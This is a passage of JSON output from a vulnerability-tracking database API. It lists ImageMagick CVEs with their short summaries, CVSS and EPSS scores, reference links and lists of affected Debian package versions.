{ "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13305" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4az8-8361-7bg2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81982?format=api", "vulnerability_id": "VCID-4f97-2smu-6qfc", "summary": "ImageMagick: outside the range of representable values of type 'unsigned char' at MagickCore/quantum.h", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27775.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27775.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27775", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24834", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24954", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24729", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24841", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24855", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24816", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24759", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.2477", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24678", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27775" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27775", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27775" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898300", "reference_id": "1898300", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898300" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27775" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4f97-2smu-6qfc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82016?format=api", "vulnerability_id": "VCID-4s25-p8ea-zkh7", "summary": "ImageMagick: heap-based buffer overflow in PopShortPixel in MagickCore/quantum-private.h", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27752.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27752.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27752", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.54982", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.55084", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.55108", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.55134", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.55146", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.55126", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.55147", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.55151", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.5513", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0032", "scoring_system": "epss", "scoring_elements": "0.55066", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27752" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27752", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27752" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894226", "reference_id": "1894226", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894226" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27752" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4s25-p8ea-zkh7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81563?format=api", "vulnerability_id": "VCID-56xz-svu7-eue2", "summary": "ImageMagick: heap-buffer-overflow in PushCharPixel() in quantum-private.h", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-3745.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-3745.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-3745", "reference_id": "", "reference_type": "", "scores": [ { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00982", "published_at": "2026-04-24T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00936", "published_at": "2026-04-02T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00937", "published_at": "2026-04-04T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.0094", "published_at": "2026-04-07T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00944", "published_at": "2026-04-08T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00939", "published_at": "2026-04-09T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00928", "published_at": "2026-04-11T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00923", "published_at": "2026-04-12T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00925", "published_at": "2026-04-13T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00922", "published_at": "2026-04-16T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00929", "published_at": "2026-04-18T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.0098", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-3745" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3745", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3745" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1857", "reference_id": "1857", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-25T13:40:47Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1857" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2223557", "reference_id": "2223557", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-25T13:40:47Z/" } ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2223557" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/54cdc146bbe50018526770be201b56643ad58ba7", "reference_id": "54cdc146bbe50018526770be201b56643ad58ba7", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-25T13:40:47Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/54cdc146bbe50018526770be201b56643ad58ba7" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/651672f19c75161a6159d9b6838fd3095b6c5304", "reference_id": "651672f19c75161a6159d9b6838fd3095b6c5304", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-25T13:40:47Z/" } ], "url": 